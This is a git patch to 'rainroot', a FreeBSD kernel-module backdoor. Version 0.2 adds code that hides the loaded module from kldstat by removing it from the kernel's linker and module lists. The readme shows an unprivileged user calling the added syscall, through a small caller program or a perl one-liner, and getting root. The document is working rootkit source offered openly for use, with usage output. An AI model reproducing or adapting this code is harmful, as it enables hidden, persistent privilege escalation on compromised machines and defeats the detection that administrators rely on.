From 0fc9a7e995a3100939bb27c28758b8e01b58a7d3 Mon Sep 17 00:00:00 2001
From: your-favorite-hacker <dash@hack4.org>
Date: Sun, 5 Jul 2015 21:24:41 +0200
Subject: [PATCH] version 0.2, added hidefunction so mod is not found anymore
 easily

---
 rainroot/Makefile   |  4 +--
 rainroot/caller.c   | 11 +++++++
 rainroot/rainroot.c | 78 +++++++++++++++++++++++++++++++++++++--------
 rainroot/readme.txt | 37 ++++++++++++++++++---
 4 files changed, 111 insertions(+), 19 deletions(-)

diff --git a/rainroot/Makefile b/rainroot/Makefile
index ac9b2fc..e96bd5a 100755
--- a/rainroot/Makefile
+++ b/rainroot/Makefile
@@ -2,7 +2,7 @@
 # $FreeBSD: src/share/examples/kld/syscall/module/Makefile,v 1.2 2001/09/18 12:03:42 ru Exp $
 
 KMOD=	rainroot
-SRCS=	vnode_if.h\
-	rainroot.c
+SRCS=	rainroot.c
+	
 
 .include <bsd.kmod.mk>
diff --git a/rainroot/caller.c b/rainroot/caller.c
index f4a33f9..230dc1a 100644
--- a/rainroot/caller.c
+++ b/rainroot/caller.c
@@ -4,9 +4,20 @@
 #include <sys/syscall.h>
 #include <stdlib.h>
 
+void help(){
+	printf("rainroot caller\nuse appropiate syscallnumber (default: 210)\nexample: ./caller 210\n\nby dash\n");
+	
+
+}
+
 int main(int argc, char *argv[]){
 
 	int scall=-1;
+	if(argc<2){
+		help();
+		exit(1);
+	}
+	
 	scall = atoi(argv[1]);
 
 	syscall(scall);
diff --git a/rainroot/rainroot.c b/rainroot/rainroot.c
index 7386982..6ee901f 100755
--- a/rainroot/rainroot.c
+++ b/rainroot/rainroot.c
@@ -2,6 +2,10 @@
 	instant r00t :)
 	ancient code, time to publish 
 	by -
+
+	added code for hiding the module
+	basic hide code was built some years back during reading
+	BSD Rootkits by Joseph Kong, it is quite nice have a look!
  */	
 
 #include <sys/types.h>
@@ -15,7 +19,37 @@
 #include <sys/linker.h>
 #include <sys/libkern.h>
 #include <sys/sysproto.h>
+#include <sys/lock.h>
+#include <sys/mutex.h>
+#include <sys/_mutex.h>
+#include <sys/sx.h>
 
+#include <vm/vm.h>
+#include <vm/vm_page.h>
+#include <vm/vm_map.h>
+
+#define HIDEMOD "rainroot.ko"
+#define HIDE	"rainroot"
+
+extern linker_file_list_t linker_files;
+static struct mtx kld_mtx;
+extern int next_file_id;
+
+typedef TAILQ_HEAD(,module) modulelist_t;
+extern modulelist_t modules;
+extern int nextid;
+
+struct module {
+	TAILQ_ENTRY(module) link;
+	TAILQ_ENTRY(module) flink;
+	struct linker_file *file;
+	int refs;
+	int id;
+	char *name;
+	modeventhand_t	handler;
+	void *arg;
+	modspecific_t data;
+};
 
 /*
  * The function for implementing the syscall.
@@ -41,20 +75,38 @@ static int offset = NO_SYSCALL;
 static int
 load (struct module *module, int cmd, void *arg)
 {
-	int error = 0;
+	struct linker_file *lf;
+	struct module *mod;
+	mtx_init(&kld_mtx, "hide lock",NULL,MTX_DEF);
+	mtx_lock(&Giant);
+	mtx_lock(&kld_mtx);
 
-	switch (cmd) {
-	case MOD_LOAD :
-		printf ("call me at %d\n", offset);
-		break;
-	case MOD_UNLOAD :
-		printf ("call me at %d\n", offset);
-		break;
-	default :
-		error = EOPNOTSUPP;
-		break;
+	(&linker_files)->tqh_first->refs--;
+
+	TAILQ_FOREACH(lf, &linker_files,link)
+	{
+	if (strcmp(lf->filename,HIDEMOD)==0){
+	next_file_id--;
+	TAILQ_REMOVE(&linker_files,lf,link);
+	break;
+	}
 	}
-	return error;
-}
 
+	mtx_unlock(&kld_mtx);
+	mtx_unlock(&Giant);
+
+	sx_xlock(&modules_sx);
+
+	TAILQ_FOREACH(mod, &modules, link){
+	if(strcmp(mod->name,HIDE)==0){
+	nextid--;
+	TAILQ_REMOVE(&modules,mod,link);
+	break;
+	}
+	}
+
+	sx_unlock(&modules_sx);
+
+	return(0);
+}
 SYSCALL_MODULE(syscall, &offset, &gimme_rude_sysent, load, NULL);
diff --git a/rainroot/readme.txt b/rainroot/readme.txt
index a747589..a5270dd 100644
--- a/rainroot/readme.txt
+++ b/rainroot/readme.txt
@@ -1,29 +1,58 @@
 rainr00t
 ========
 
-instant root-priv backd00r via kernelland anyone? 
+instant root-priv backd00r via kernelland anyone? get root and hide the module.
 well this module, once loaded gives the thread/user calling instantly root, without spawning an extra
 shell or alike. 
 
+new feature in version 0.2
+--------------------------
+
+automaticly hiding the loaded module, be aware that you cant easily unload it now ;)
+
 usage
 -----
 
+kernel
+******
 root@crashb0x:~/gainroot # uname -a
 FreeBSD crashb0x 10.1-RELEASE FreeBSD 10.1-RELEASE #0 r274401: Tue Nov 11 21:02:49 UTC 2014     root@releng1.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64
 
 root@crashb0x:~/gainroot # kldload ./rainroot.ko
-
 root@crashb0x:~/gainroot # kldstat
 Id Refs Address            Size     Name
  1    3 0xffffffff80200000 1755658  kernel
- 3    1 0xffffffff81a12000 20e      rainroot.ko
 
-# userland tool, to call the newly loaded syscall (normally its syscall 210)
+No rainroot in kldstat, just the default kernel.
+
+userland
+********
+
+# userland tool, to call the newly loaded syscall (normally its syscall 210, depending if you got extra syscalls on your box already) In this examples it is syscall nr 211.
+
+compile it
 l00ser@crashb0x:/tmp $ gcc48 caller.c -o caller
+
+test for help
+# ./caller 
+rainroot caller
+use appropiate syscallnumber (default: 210)
+example: ./caller 210
+
+execute and get root
 l00ser@crashb0x:/tmp % ./caller 211
 l00ser@crashb0x:/tmp % id
 uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
 
+besides the caller you could also go with every language or operation requesting the syscall. for instance
+ this perl one-liner:
+
+l00ser@crashb0x:~ % id
+uid=1001(l00ser) gid=1001(l00ser) groups=1001(l00ser)
+l00ser@crashb0x:~ % perl -e 'syscall(211);'
+l00ser@crashb0x:~ % id
+uid=0(root) gid=0(wheel) egid=1001(l00ser) groups=1001(l00ser)
+
 author
 ------
 dash